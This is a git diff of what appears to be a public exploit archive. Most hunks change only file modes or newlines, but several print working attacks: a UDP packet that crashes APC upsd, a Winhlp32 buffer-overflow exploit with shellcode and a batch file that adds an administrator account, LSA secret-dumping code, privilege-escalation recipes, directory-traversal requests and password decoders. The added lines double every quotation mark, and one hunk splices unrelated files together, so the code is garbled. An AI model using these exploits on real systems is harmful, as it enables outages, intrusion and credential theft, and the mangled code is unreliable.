the product. +// +// It has also been reported the software will crash in some instances when port scanned. +// +// It seems you can also manage any APC UPS remotely without providing any credential if you have the APC client software. +// +// Both the client and server software also create files insecurely in /tmp. The pager script (dialpager.sh) also contains unsafe users of temporary files. The mailer script (mailer.sh) passes the files provided in the command line to rm without checking them. +// +// ----- begin downupsd.c ----- #include <stdio.h> +#include <stdlib.h> +#include <unistd.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <netdb.h> +#include <netinet/in.h> -#include "ntsecapi.h" -#define AST(x) if (!(x)) {printf("Failed line %d\n", __LINE__);exit(1);} else -void write(); +int main(int argc, char **argv) { +int s; +long on=1; +size_t addrsize; +char buffer[256]; +struct sockaddr_in toaddr, fromaddr; +struct hostent h_ent; -PLSA_UNICODE_STRING -str(LPWSTR x) -{ -static LSA_UNICODE_STRING s; - -s.Buffer=x; -s.Length=wcslen(x)*sizeof(WCHAR); -s.MaximumLength = (wcslen(x)+1)*2; -return &s; -} - -int _cdecl -main(int argc, char *argv[]) -{ -LSA_HANDLE pol; -PLSA_UNICODE_STRING foo; -LSA_OBJECT_ATTRIBUTES attrs; -WCHAR keyname[256]=L""; -WCHAR host[256]=L""; - -wsprintfW(keyname, L"%hS", argv[1]); -if(argc == 3) wsprintfW(host, L"%hS", argv[2]); -memset(&attrs, 0, sizeof(attrs)); -AST(!LsaOpenPolicy(str(host), &attrs, 0, &pol)); -AST(!LsaRetrievePrivateData(pol, str(keyname), &foo)); -write(1, foo->Buffer, foo->Length); -LsaClose(pol); +if(argc!=2) { +fprintf(stderr, ""Usage:\n\t%s <hostname running upsd>\n"", argv[0]); exit(0); } -<---end---> \ No newline at end of file +s = socket(AF_INET,SOCK_DGRAM,0); +setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on)); + +printf(""Crashing upsd on host's subnet: %s\n"", argv[1]); + +toaddr.sin_family = AF_INET; +toaddr.sin_port = htons(0); +toaddr.sin_addr.s_addr = 0x00000000; +bind(s, (struct sockaddr *)&toaddr, sizeof(struct sockaddr_in)); +toaddr.sin_port = htons(6549); +memcpy((char *)&h_ent, (char *)gethostbyname(argv[1]), sizeof(h_ent)); +memcpy(&toaddr.sin_addr.s_addr, h_ent.h_addr, sizeof(struct in_addr)); +toaddr.sin_addr.s_addr |= 0xff000000; +strcpy(buffer, ""027|1|public|9|0|0|2010~|0\0""); +sendto(s, buffer, 256, 0, (struct sockaddr *)&toaddr, +sizeof(struct sockaddr_in)); + +printf(""Crashed...\n""); +close(s); + +} +------- end downupsd.c ----- \ No newline at end of file diff --git a/platforms/windows/local/19196.txt b/platforms/windows/local/19196.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19198.txt b/platforms/windows/local/19198.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19209.c b/platforms/windows/local/19209.c old mode 100755 new mode 100644 index e1be25559..cb439685d --- a/platforms/windows/local/19209.c +++ b/platforms/windows/local/19209.c @@ -1,78 +1,78 @@ -source: http://www.securityfocus.com/bid/261/info - -Lax permission in the Windows NT help file folder and a buffer overflow in the Help utility may allow malicious users to gain Administrator privileges. - -The Windows NT Help utility parses and displays help information for selected applications. The help files are stored in the %SystemRoot%\help directory. The default permissions in this directory allow any user to add new files. - -A buffer overflow exists in the Help utility when it attempts to read a .cnt file with an overly long heading string. Content tab informaton files (".cnt") are generated when rich text format files (".rtf") are translated to help files (".hlp"). If the string is longer than 507 bytes winhlp32 truncates the entry and the buffer overflow does not occur. - -A malicious user can create a custom .cnt help file with executable code in an entry string which when stored in the help directory and viewed by an unsuspecting user can grant them that users privileges. - -The vulnerability is not limited by the permissions of the help file directory as the Help utility will search for a .cnt file first in its execution directory before looking in the help file directory. - +// source: http://www.securityfocus.com/bid/261/info +// +// Lax permission in the Windows NT help file folder and a buffer overflow in the Help utility may allow malicious users to gain Administrator privileges. +// +// The Windows NT Help utility parses and displays help information for selected applications. The help files are stored in the %SystemRoot%\help directory. The default permissions in this directory allow any user to add new files. +// +// A buffer overflow exists in the Help utility when it attempts to read a .cnt file with an overly long heading string. Content tab informaton files ("".cnt"") are generated when rich text format files ("".rtf"") are translated to help files ("".hlp""). If the string is longer than 507 bytes winhlp32 truncates the entry and the buffer overflow does not occur. +// +// A malicious user can create a custom .cnt help file with executable code in an entry string which when stored in the help directory and viewed by an unsuspecting user can grant them that users privileges. +// +// The vulnerability is not limited by the permissions of the help file directory as the Help utility will search for a .cnt file first in its execution directory before looking in the help file directory. +// #include <stdio.h> #include <windows.h> #include <string.h> int main(void) { - char eip[5]="\xE5\x27\xF3\x77"; + char eip[5]=""\xE5\x27\xF3\x77""; char -ExploitCode[200]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x1A\x38\xF1\x77\x52\x8D\x45\xF4\x50\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x41\xC6\x45\xFD\x44\xC6\x45\xFE\x44\xB8\xE1\xE1\xA0\x77\x50\x8D\x45\xFC\x50\xFF\x55\xF8\x55\x8B\xEC\xBA\xBA\x5B\x9F\x77\x52\x33\xC0\x50\xFF\x55\xFC"; +ExploitCode[200]=""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x1A\x38\xF1\x77\x52\x8D\x45\xF4\x50\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x41\xC6\x45\xFD\x44\xC6\x45\xFE\x44\xB8\xE1\xE1\xA0\x77\x50\x8D\x45\xFC\x50\xFF\x55\xF8\x55\x8B\xEC\xBA\xBA\x5B\x9F\x77\x52\x33\xC0\x50\xFF\x55\xFC""; FILE *fd; - printf("\n\n*******************************************************\n"); - printf("* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n"); - printf("* This version runs on Service Pack 4 machines and *\n"); - printf("* assumes a msvcrt.dll version of 4.00.6201 *\n"); - printf("* *\n"); - printf("* (C) David Litchfield (mnemonix@globalnet.co.uk) '99 *\n"); - printf("*******************************************************\n\n"); + printf(""\n\n*******************************************************\n""); + printf(""* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n""); + printf(""* This version runs on Service Pack 4 machines and *\n""); + printf(""* assumes a msvcrt.dll version of 4.00.6201 *\n""); + printf(""* *\n""); + printf(""* (C) David Litchfield (mnemonix@globalnet.co.uk) '99 *\n""); + printf(""*******************************************************\n\n""); - fd = fopen("wordpad.cnt", "r"); + fd = fopen(""wordpad.cnt"", ""r""); if (fd==NULL) { - printf("\n\nWordpad.cnt not found or insufficient rights to access it.\nRun this from the WINNT\\HELP directory"); + printf(""\n\nWordpad.cnt not found or insufficient rights to access it.\nRun this from the WINNT\\HELP directory""); return 0; } fclose(fd); - printf("\nMaking a copy of real wordpad.cnt - wordpad.sav\n"); - system("copy wordpad.cnt wordpad.sav"); - printf("\n\nCreating wordpad.cnt with exploit code..."); - fd = fopen("wordpad.cnt", "w+"); - if (fd==NULL) + printf(""\nMaking a copy of real wordpad.cnt - wordpad.sav\n""); + system(""copy wordpad.cnt wordpad.sav""); + printf(""\n\nCreating wordpad.cnt with exploit code...""); + fd = fopen(""wordpad.cnt"", ""w+""); + if (fd==NULL) { - printf("Failed to open wordpad.cnt in write mode. Check you have sufficent rights\n"); + printf(""Failed to open wordpad.cnt in write mode. Check you have sufficent rights\n""); return 0; } - fprintf(fd,"1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%s%s\n",eip,ExploitCode); + fprintf(fd,""1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%s%s\n"",eip,ExploitCode); - fprintf(fd,"2 Opening a document=WRIPAD_OPEN_DOC\n"); + fprintf(fd,""2 Opening a document=WRIPAD_OPEN_DOC\n""); fclose(fd); - printf("\nCreating batch file add.bat\n\n"); - fd = fopen("add.bat", "w"); + printf(""\nCreating batch file add.bat\n\n""); + fd = fopen(""add.bat"", ""w""); if (fd == NULL) { - printf("Couldn't create batch file. Manually create one instead"); + printf(""Couldn't create batch file. Manually create one instead""); return 0; } - printf("The batch file will attempt to create a user account called \"winhlp\" and\n"); - printf("with a password of \"winhlp!!\" and add it to the Local Administrators group.\n"); - printf("Once this is done it will reset the files and delete itself.\n"); - fprintf(fd,"net user winhlp winhlp!! /add\n"); - fprintf(fd,"net localgroup administrators winhlp /add\n"); - fprintf(fd,"del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n"); - fprintf(fd,"del wordpad.sav\n"); - fprintf(fd,"del add.bat\n"); - fclose(fd); - printf("\nBatch file created."); - printf("\n\nCreated. Now open up Wordpad and click on Help\n"); + printf(""The batch file will attempt to create a user account called \""winhlp\"" and\n""); + printf(""with a password of \""winhlp!!\"" and add it to the Local Administrators group.\n""); + printf(""Once this is done it will reset the files and delete itself.\n""); + fprintf(fd,""net user winhlp winhlp!! /add\n""); + fprintf(fd,""net localgroup administrators winhlp /add\n""); + fprintf(fd,""del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n""); + fprintf(fd,""del wordpad.sav\n""); + fprintf(fd,""del add.bat\n""); + fclose(fd); + printf(""\nBatch file created.""); + printf(""\n\nCreated. Now open up Wordpad and click on Help\n""); return 0; - - + + } -NOTE: The attached exploit code has been compiled to run on Windows NT 4.0 SP4 with msvcrt.dll version 4.20.6201 +NOTE: The attached exploit code has been compiled to run on Windows NT 4.0 SP4 with msvcrt.dll version 4.20.6201 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19209.tar.gz \ No newline at end of file diff --git a/platforms/windows/local/19211.c b/platforms/windows/local/19211.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19220.c b/platforms/windows/local/19220.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19227.txt b/platforms/windows/local/19227.txt old mode 100755 new mode 100644 index 2a805102f..f9b01a34f --- a/platforms/windows/local/19227.txt +++ b/platforms/windows/local/19227.txt @@ -4,4 +4,4 @@ The IBM Remote Control Software package requires a client module to be loaded on It has been discovered that this service may be exploited by a local user level account to execute code with administrator privileges. This vulnerability would allow a user (with no admin rights) to execute programs that might allow them to elevate their privileges to that of an administrator. -Open the Netfinity client. Launch the Process Manager. From the Process Manager interface, launch arbitrary code. usrmgr.exe, musrmgr.exe, regedt32.exe, etc. may be launched and be used by the user level account to grant administrator privileges to any account on the host (or domain). \ No newline at end of file +Open the Netfinity client. Launch the Process Manager. From the Process Manager interface, launch arbitrary code. usrmgr.exe, musrmgr.exe, regedt32.exe, etc. may be launched and be used by the user level account to grant administrator privileges to any account on the host (or domain). \ No newline at end of file diff --git a/platforms/windows/local/19323.c b/platforms/windows/local/19323.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19359.txt b/platforms/windows/local/19359.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19376.txt b/platforms/windows/local/19376.txt old mode 100755 new mode 100644 index f95351f49..d3b8ec821 --- a/platforms/windows/local/19376.txt +++ b/platforms/windows/local/19376.txt @@ -38,4 +38,4 @@ void CRbExtension::Default(CHttpServerContext* pCtxt) *pCtxt << _T("Reboot<br>"); EndContent(pCtxt); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/local/19401.txt b/platforms/windows/local/19401.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19412.c b/platforms/windows/local/19412.c old mode 100755 new mode 100644 index b7a825ec9..63dca973c --- a/platforms/windows/local/19412.c +++ b/platforms/windows/local/19412.c @@ -13,4 +13,4 @@ for(i = 0; i < strlen(argv[1]); i++) putchar(argv[1][i]^(char)((i + 1) << 1)); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/local/19425.txt b/platforms/windows/local/19425.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1944.c b/platforms/windows/local/1944.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19440.c b/platforms/windows/local/19440.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19462.c b/platforms/windows/local/19462.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19472.txt b/platforms/windows/local/19472.txt old mode 100755 new mode 100644 index cb126ee7d..31245b213 --- a/platforms/windows/local/19472.txt +++ b/platforms/windows/local/19472.txt @@ -11,4 +11,4 @@ Value Name: GroupName (where group name is the name of the group to add the the Data Type: Reg_SZ String: Administrators -Reboot the host. \ No newline at end of file +Reboot the host. \ No newline at end of file diff --git a/platforms/windows/local/19473.txt b/platforms/windows/local/19473.txt old mode 100755 new mode 100644 index eaa4a7df7..1dad398c0 --- a/platforms/windows/local/19473.txt +++ b/platforms/windows/local/19473.txt @@ -8,4 +8,4 @@ Because the "Bypass Traverse Checking" right is assigned by default to the Every To bypass traverse checking and access another user's index.dat files, reference the absolute filename. For example, to search for all index.dat files belonging to the "administrator" account, issue the following command from a command prompt: -find "//"<\winnt\profiles\administrator\history\history.ie5\index.dat \ No newline at end of file +find "//"<\winnt\profiles\administrator\history\history.ie5\index.dat \ No newline at end of file diff --git a/platforms/windows/local/19502.txt b/platforms/windows/local/19502.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19506.txt b/platforms/windows/local/19506.txt old mode 100755 new mode 100644 index 72bb5b837..1377c4895 --- a/platforms/windows/local/19506.txt +++ b/platforms/windows/local/19506.txt @@ -14,4 +14,4 @@ DWORD=1 The Security Permissions over these Registry Keys are Set to "Everyone:Special Access". Special Access, in these instances, includes 'Set Value'. This permission allows members of the Everyone Group (Domain Users, Users, Guests, etc.) to modify the value of these keys, including the ability to disable the security features which may have been enabled by the administrator. Disabling the Data Factory\HandlerInfo setting ("handlerRequired DWORD=0") may open the host to exploit via the MDAC RDS exploit as described in Bugtraq ID 529 <http://www.securityfocus.com/bid/529.html>. -Modify the HKEY_Local_Machine\Software\Microsoft\DataFactory\HandlerInfo Registry Key value "handlerRequired" to DWORD=0 \ No newline at end of file +Modify the HKEY_Local_Machine\Software\Microsoft\DataFactory\HandlerInfo Registry Key value "handlerRequired" to DWORD=0 \ No newline at end of file diff --git a/platforms/windows/local/19516.txt b/platforms/windows/local/19516.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19528.txt b/platforms/windows/local/19528.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19585.c b/platforms/windows/local/19585.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19594.txt b/platforms/windows/local/19594.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19610.c b/platforms/windows/local/19610.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19633.txt b/platforms/windows/local/19633.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19665.txt b/platforms/windows/local/19665.txt old mode 100755 new mode 100644 index 33f153724..8c86be6e9 --- a/platforms/windows/local/19665.txt +++ b/platforms/windows/local/19665.txt @@ -32,4 +32,4 @@ Off Data 140 00[1D]000[1D]000[1D]000[1D]0 150 000[1A][6F][36][1D]0000000[1D]0 160 000000[1D]0 ------------------------------------------------- \ No newline at end of file +------------------------------------------------ \ No newline at end of file diff --git a/platforms/windows/local/19673.txt b/platforms/windows/local/19673.txt old mode 100755 new mode 100644 index 55ad3d704..13740dc67 --- a/platforms/windows/local/19673.txt +++ b/platforms/windows/local/19673.txt @@ -20,4 +20,4 @@ to read: - Run WinWord and select Help|Contents from menubar. - Find topic "Word 97 new features" and select it. -- You should see CMD.EXE to run. \ No newline at end of file +- You should see CMD.EXE to run. \ No newline at end of file diff --git a/platforms/windows/local/19678.c b/platforms/windows/local/19678.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19683.c b/platforms/windows/local/19683.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19728.txt b/platforms/windows/local/19728.txt old mode 100755 new mode 100644 index a2f51c27f..9fb43ba4c --- a/platforms/windows/local/19728.txt +++ b/platforms/windows/local/19728.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/945/info The default permissions applied to the directory containing the SMS Remote Control executable allow any user to replace the executable with any other executable. The new executable will run with System privileges after the next reboot. -Replace %SMS_LOCAL_DIR%\MS\SMS\CLICOMP\REMCTRL\WUSER32.EXE with a copy of wuser32.exe. After the next reboot, User Manager will run at startup with System privileges, allowing the logged-in user to add their account to arbitrary groups, including Administrators. \ No newline at end of file +Replace %SMS_LOCAL_DIR%\MS\SMS\CLICOMP\REMCTRL\WUSER32.EXE with a copy of wuser32.exe. After the next reboot, User Manager will run at startup with System privileges, allowing the logged-in user to add their account to arbitrary groups, including Administrators. \ No newline at end of file diff --git a/platforms/windows/local/19733.txt b/platforms/windows/local/19733.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19739.txt b/platforms/windows/local/19739.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19754.txt b/platforms/windows/local/19754.txt old mode 100755 new mode 100644 index 0d3bef438..ff9918dee --- a/platforms/windows/local/19754.txt +++ b/platforms/windows/local/19754.txt @@ -16,4 +16,4 @@ The following exploit has been provided by Nelson Brito <nelson@secunet.com.br>: 4 - try to connect as user nelson and password nelson; 5 - BINDO, you are now a member of "Administrators" group(Stand Alone Servers) or -"Domain Admins" gourp(PDC Servers). \ No newline at end of file +"Domain Admins" gourp(PDC Servers). \ No newline at end of file diff --git a/platforms/windows/local/19789.txt b/platforms/windows/local/19789.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19798.txt b/platforms/windows/local/19798.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19836.c b/platforms/windows/local/19836.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19839.txt b/platforms/windows/local/19839.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19855.txt b/platforms/windows/local/19855.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/1986.cpp b/platforms/windows/local/1986.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19894.txt b/platforms/windows/local/19894.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19968.c b/platforms/windows/local/19968.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19989.c b/platforms/windows/local/19989.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/19993.txt b/platforms/windows/local/19993.txt old mode 100755 new mode 100644 index 493b26299..035d27ccd --- a/platforms/windows/local/19993.txt +++ b/platforms/windows/local/19993.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/1307/info While using ICQmailclient, the user creates a temporary internet link created in a default temporary directory, which remains even after the user signs out or closes ICQ. This link may be re-opened by another user, thus giving them full access to the ICQmail webaccount. The temporary link can be found in the default temp file (eg. c:\temp) and appears as: -http://cf.icq.com/cgi-bin/icqmail/write.pl5?uname=username&pwd=12345678 \ No newline at end of file +http://cf.icq.com/cgi-bin/icqmail/write.pl5?uname=username&pwd=12345678 \ No newline at end of file diff --git a/platforms/windows/local/20012.txt b/platforms/windows/local/20012.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20022.txt b/platforms/windows/local/20022.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20081.c b/platforms/windows/local/20081.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20133.cpp b/platforms/windows/local/20133.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20209.cpp b/platforms/windows/local/20209.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20232.cpp b/platforms/windows/local/20232.cpp old mode 100755 new mode 100644 index 9283b8e5a..4aa0bdb1a --- a/platforms/windows/local/20232.cpp +++ b/platforms/windows/local/20232.cpp @@ -49,4 +49,4 @@ BOOL APIENTRY DllMain( HANDLE hModule, 1) Rename dll1.dll to riched20.dll 2) Place riched20.dll in a directory of your choice 3) Close all Office applications -4) From Windows Explorer double click on an Office document (preferably MS Word document) in the directory containg riched20.dll \ No newline at end of file +4) From Windows Explorer double click on an Office document (preferably MS Word document) in the directory containg riched20.dll \ No newline at end of file diff --git a/platforms/windows/local/20257.txt b/platforms/windows/local/20257.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20265.txt b/platforms/windows/local/20265.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20317.c b/platforms/windows/local/20317.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20383.txt b/platforms/windows/local/20383.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20401.txt b/platforms/windows/local/20401.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20407.c b/platforms/windows/local/20407.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20409.c b/platforms/windows/local/20409.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20451.c b/platforms/windows/local/20451.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20456.c b/platforms/windows/local/20456.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20457.c b/platforms/windows/local/20457.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2056.c b/platforms/windows/local/2056.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20585.txt b/platforms/windows/local/20585.txt old mode 100755 new mode 100644 index b582d31ee..19c35be1d --- a/platforms/windows/local/20585.txt +++ b/platforms/windows/local/20585.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2268/info LocalWEB2000 is subject to a directory traversal. Requesting a specially crafted HTTP request with a known filename will enable an attacker to gain read access to the requested file. -http://target/../../../autoexec.bat \ No newline at end of file +http://target/../../../autoexec.bat \ No newline at end of file diff --git a/platforms/windows/local/2065.c b/platforms/windows/local/2065.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/20651.txt b/platforms/windows/local/20651.txt old mode 100755 new mode 100644 index 57b3d5d0d..985b00ced --- a/platforms/windows/local/20651.txt +++ b/platforms/windows/local/20651.txt @@ -7,4 +7,4 @@ A problem in the software could allow access to restricted resources. Due to ins This makes it possible for a malicious user with access to the ftp server to gain access to sensitive information, including password files stored on the server. ftp> cd .. -ftp> get ../../autoexec.bat \ No newline at end of file +ftp> get ../../autoexec.bat \ No newline at end of file diff --git a/platforms/windows/local/20880.c b/platforms/windows/local/20880.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2091.cpp b/platforms/windows/local/2091.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/2094.c b/platforms/windows/local/2094.c old mode 100755 new mode 100644 index c63feef9c..50e67ee64 --- a/platforms/windows/local/2094.c +++ b/platforms/windows/local/2094.c @@ -271,5 +271,4 @@ void std_err(void) { exit(1); } -// milw0rm.com [2006-07-31] - \ No newline at end of file +// milw0rm.com [2006-07-31] \ No newline at end of file diff --git a/platforms/windows/local/21044.c b/platforms/windows/local/21044.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21069.c b/platforms/windows/local/21069.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21071.c b/platforms/windows/local/21071.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21072.txt b/platforms/windows/local/21072.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21090.txt b/platforms/windows/local/21090.txt old mode 100755 new mode 100644 index a4da20d55..d429619d1 --- a/platforms/windows/local/21090.txt +++ b/platforms/windows/local/21090.txt @@ -30,4 +30,4 @@ For i = 1 To Len(str_password) CuteDecodeString = CuteDecodeString + Chr$(CuteDecode(Asc(Mid(str_password, i, 1)))) Next i -End Function \ No newline at end of file +End Function \ No newline at end of file diff --git a/platforms/windows/local/21091.txt b/platforms/windows/local/21091.txt old mode 100755 new mode 100644 index f125e4366..d95e4a61c --- a/platforms/windows/local/21091.txt +++ b/platforms/windows/local/21091.txt @@ -43,4 +43,4 @@ For i = 1 To (Len(str_password) / 2) UEDecodeString = UEDecodeString + Chr$(UEDecode(Val("&H" + Mid(str_password, (2 * (i - 1)) + 1, 2)), i)) Next i -End Function \ No newline at end of file +End Function \ No newline at end of file diff --git a/platforms/windows/local/21096.txt b/platforms/windows/local/21096.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21130.c b/platforms/windows/local/21130.c old mode 100755 new mode 100644 index daa23f762..38e238fec --- a/platforms/windows/local/21130.c +++ b/platforms/windows/local/21130.c @@ -11,4 +11,4 @@ int main(void) while (1) printf("\t\t\b\b\b\b\b\b"); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/local/21173.pl b/platforms/windows/local/21173.pl index b6efec803..906b05c2c 100755 --- a/platforms/windows/local/21173.pl +++ b/platforms/windows/local/21173.pl @@ -79,4 +79,4 @@ PRINT @usrID + ' : ' + @cryptstr FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr END DEALLOCATE pwd_cursor -GO \ No newline at end of file +GO \ No newline at end of file diff --git a/platforms/windows/local/21344.txt b/platforms/windows/local/21344.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21547.txt b/platforms/windows/local/21547.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21549.txt b/platforms/windows/local/21549.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21550.txt b/platforms/windows/local/21550.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21551.txt b/platforms/windows/local/21551.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21629.txt b/platforms/windows/local/21629.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21684.c b/platforms/windows/local/21684.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21685.c b/platforms/windows/local/21685.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21686.c b/platforms/windows/local/21686.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21687.c b/platforms/windows/local/21687.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21688.c b/platforms/windows/local/21688.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21689.c b/platforms/windows/local/21689.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21690.txt b/platforms/windows/local/21690.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21691.txt b/platforms/windows/local/21691.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21721.html b/platforms/windows/local/21721.html old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21781.c b/platforms/windows/local/21781.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21831.c b/platforms/windows/local/21831.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21887.php b/platforms/windows/local/21887.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21892.txt b/platforms/windows/local/21892.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21922.c b/platforms/windows/local/21922.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/21923.c b/platforms/windows/local/21923.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/22193.txt b/platforms/windows/local/22193.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/22225.txt b/platforms/windows/local/22225.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/22329.c b/platforms/windows/local/22329.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/22354.c b/platforms/windows/local/22354.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/22465.txt b/platforms/windows/local/22465.txt old mode 100755 new mode 100644 index 3887767f4..af10251cd --- a/platforms/windows/local/22465.txt +++ b/platforms/windows/local/22465.txt @@ -13,4 +13,4 @@ function allows you to run any external program/execuable you want, without spec credentials. By default, this product installs under the LOCALSYSTEM service so when the binary is executed, it runs under that context. -Sysax fixed this problem in version 5.34. \ No newline at end of file +Sysax fixed this problem in version 5.34. \ No newline at end of file diff --git a/platforms/windows/local/22528.c b/platforms/windows/local/22528.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/22564.c b/platforms/windows/local/22564.c old mode 100755 new mode 